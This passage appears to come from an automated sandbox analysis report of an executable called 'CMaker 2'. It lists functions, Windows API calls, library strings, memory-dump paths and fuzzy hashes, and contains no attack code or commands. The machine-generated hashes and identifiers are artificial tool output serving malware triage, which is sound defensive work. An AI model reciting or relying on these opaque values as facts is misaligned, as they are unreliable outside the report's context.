                                                                                                                                                                                  • String ID: argument 'data'$contiguous buffer$decompress
                                                                                                                                                                                  • API String ID: 543699976-2667845042
                                                                                                                                                                                  • Opcode ID: 6382e5f378423087b012bb09d00c2418faefeb1a7db955bbc4190eedbd27ec23
                                                                                                                                                                                  • Instruction ID: 41e59860d6cc1f8ed8cf8a6367b36764b9a75f3e158c521b446b2aa7996dcf15
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6382e5f378423087b012bb09d00c2418faefeb1a7db955bbc4190eedbd27ec23
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04415022F18B8292EA208F92D86627963A4FF85B94F544335DE9D03795FF7CE545C700
                                                                                                                                                                                  Function 00007FFD935A19DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007F294
                                                                                                                                                                                  • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                  • API String ID: 1145900664-1778748169
                                                                                                                                                                                  • Opcode ID: 10ce8fe54628ff813415ccb6b761ad5681ec6e9ea4152f83edd5d38152cc8e62
                                                                                                                                                                                  • Instruction ID: 36a310f02d0794bfd46a6c77cfa55191fca5f800ea94f880048b407925edca05
                                                                                                                                                                                  • Opcode Fuzzy Hash: 10ce8fe54628ff813415ccb6b761ad5681ec6e9ea4152f83edd5d38152cc8e62
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F415E22B0AA4290FAB6EFE194707786299EF48F94F184634DD5D2B78DDF2CE4418310
                                                                                                                                                                                  Function 00007FF6FABE6700 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF6FABE240C,?,?,00007FF6FABE2BD3), ref: 00007FF6FABE6812
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                  • Opcode ID: 6e5035dbc1b852fd1acf17fbddd39f3d5f0da3e0774f47cd658e59bf52890ea1
                                                                                                                                                                                  • Instruction ID: 1a3b312fc1ceecaeac6e5876e9b18934c519b93c8afc7e6687d8259a19f95204
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e5035dbc1b852fd1acf17fbddd39f3d5f0da3e0774f47cd658e59bf52890ea1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6931C661B19AC145EB219B21E4A03AA6368EF45BE0F8442B1EE7D837C5FF2CD6458700
                                                                                                                                                                                  Function 00007FFD9DF9FA4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007$A43319B222F020
                                                                                                                                                                                  • String ID: _decode_filter_properties$argument 2$contiguous buffer
                                                                                                                                                                                  • API String ID: 3743873318-2431706548
                                                                                                                                                                                  • Opcode ID: d0d5ee3e36b1fd2ee5b71e46036ef2d7681d41e25c6df013ffe0f436d647eea6
                                                                                                                                                                                  • Instruction ID: bfa72f04cfa6aa4a422a7ddd1e695149bbcdb64530d87f265c5eb03e5b4c3b6a
                                                                                                                                                                                  • Opcode Fuzzy Hash: d0d5ee3e36b1fd2ee5b71e46036ef2d7681d41e25c6df013ffe0f436d647eea6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78316F25B18AC291EA209FA2D4655B963A0FFD4F84F944231DA8D47764FF7CE945C700
                                                                                                                                                                                  Function 00007FF6FABE1ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                                  • String ID: %ls: %ls$<FormatMessageW failed.>
                                                                                                                                                                                  • API String ID: 3479602957-1483686772
                                                                                                                                                                                  • Opcode ID: 373fdf3d9fdea1001e654d74ede15a600c77928950e2177ba9a3bce8723e614f
                                                                                                                                                                                  • Instruction ID: 1eab5eae25e192c39ad60680f2919d8a5668a82677ba4121e2168660e23f8bd4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 373fdf3d9fdea1001e654d74ede15a600c77928950e2177ba9a3bce8723e614f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B119EA2B08B4185E7109B52F8007AA6660BF89BC4F484175EE9D877AAEF3CD5458740
                                                                                                                                                                                  Function 00007FFD9DF98320 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007A43319
                                                                                                                                                                                  • String ID: argument$compress$contiguous buffer
                                                                                                                                                                                  • API String ID: 543699976-2310704374
                                                                                                                                                                                  • Opcode ID: 73d707368097f9107c696c03eed7c0f9fa885a42ec55bc1bd0849f6848a8ac0d
                                                                                                                                                                                  • Instruction ID: 0b974adfeb2f73c1803c5aed03416a72fabe936ff12f9ab563dc552cd0dc6daf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 73d707368097f9107c696c03eed7c0f9fa885a42ec55bc1bd0849f6848a8ac0d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4119622B18AC691E734DFA1E4552B96360FB88B84F944231DA8D43724FF7CD545C700
                                                                                                                                                                                  Function 00007FF6FABFC220 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                  • Opcode ID: a359b4e95e1d4ffdf3b75e0a15f8e2470d7a7d379ae339a26f7f920b930d4175
                                                                                                                                                                                  • Instruction ID: 5dc2e192f1413adeda135654e5155e3f3ab25976811e2ec398e8b0453338fe77
                                                                                                                                                                                  • Opcode Fuzzy Hash: a359b4e95e1d4ffdf3b75e0a15f8e2470d7a7d379ae339a26f7f920b930d4175
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15D10576B08A4189E711CFB5E5442AC3771FB46B98B48427ACE6ED7BC9EE38D446C300
                                                                                                                                                                                  Function 00007FF6FABFF88C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                  • Opcode ID: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
                                                                                                                                                                                  • Instruction ID: e9af51909ecaf57304369aa243da24b73cf1d51fcebe3604fb00abdc1c0d1e70
                                                                                                                                                                                  • Opcode Fuzzy Hash: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 19510676F042518AEB14CFB499856BC27B5AB0535AF94427ADD3E92AE5FF3CA402C700
                                                                                                                                                                                  Function 00007FF6FABF5598 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                  • Opcode ID: ef755d5346959fbddc4573098100f0e197fecc80316e8c20252f2b5a31e3b312
                                                                                                                                                                                  • Instruction ID: b5eb429c5e4092b119cacf4cea2f5e13590e17d726c14311ddacbf50a876947a
                                                                                                                                                                                  • Opcode Fuzzy Hash: ef755d5346959fbddc4573098100f0e197fecc80316e8c20252f2b5a31e3b312
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651AF26E186018AFB10CFB0D9503BD37B5AF49B48F588279DE29CB6C9EF38E4408740
                                                                                                                                                                                  Function 00007FFD9DFD2FEC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                  • Opcode ID: 069d66e8074b6e4703de35db5db5515e26a216a31024ef63481ff09b43250e3e
                                                                                                                                                                                  • Instruction ID: 169fe64612c8476c6f69dd71e364741b832b4025a238778e8a221d32aa6e93e0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 069d66e8074b6e4703de35db5db5515e26a216a31024ef63481ff09b43250e3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE110326B14F4189EB10DFA0E8592B833A4F759758F481F35DAAD47758EF7CD1688340
                                                                                                                                                                                  Function 00007FF6FABEB480 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                  • Opcode ID: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
                                                                                                                                                                                  • Instruction ID: 2b74d2cd3a17fe161126b648920d5fd9407b83312d6fe739ee151535b486d9be
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0111862B14F058AEB00CB60E8542B833B4FB19758F441E35DA6DC67A4EF78E1548340
                                                                                                                                                                                  Function 00007FF6FABE7440 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Process$ConsoleCurrentShowThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 242035731-0
                                                                                                                                                                                  • Opcode ID: ce431efa17345d7651078cf11ef9ccbb6a86d2f3d8659cd5f010f407bfbcc38a
                                                                                                                                                                                  • Instruction ID: e7180606757f4cfd7e5bb07cb326d15bae3caec75fa8657e1e9d67d914981cf5
                                                                                                                                                                                  • Opcode Fuzzy Hash: ce431efa17345d7651078cf11ef9ccbb6a86d2f3d8659cd5f010f407bfbcc38a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F03761A18A4AC1FB549B66E44413957B1FF88780F4860F0E95FC3294FE3CE0858700
                                                                                                                                                                                  Function 00007FF6FABE75B0 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Process$ConsoleCurrentShowThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 242035731-0
                                                                                                                                                                                  • Opcode ID: b8f031c1363efa834fdbd56010d3ef4b44edc5dcbdf772b005a24d0a5bd8a786
                                                                                                                                                                                  • Instruction ID: 05a9366ffd03da2348ac20c62290b627a7a5590dd87b49b4e410bcdde884e496
                                                                                                                                                                                  • Opcode Fuzzy Hash: b8f031c1363efa834fdbd56010d3ef4b44edc5dcbdf772b005a24d0a5bd8a786
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF03061A19686C2EB549B25E88413922B1FF88B84F5860B4D96FC7794FF3CE485C700
                                                                                                                                                                                  Function 00007FFD935A1A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B22408
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                  • API String ID: 4199793457-384499812
                                                                                                                                                                                  • Opcode ID: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
                                                                                                                                                                                  • Instruction ID: f16aad4695189304dba99f799cb4df71f52b6baf89cee2aa18527951e10ab485
                                                                                                                                                                                  • Opcode Fuzzy Hash: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
                                                                                                                                                                                  • Instruction Fuzzy Hash: D2D14C32B09B8692EBA69FA6D4A06BC33B8FB48B80F454035DE5D97795DF38E550C310
                                                                                                                                                                                  Function 00007FFD935A2130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
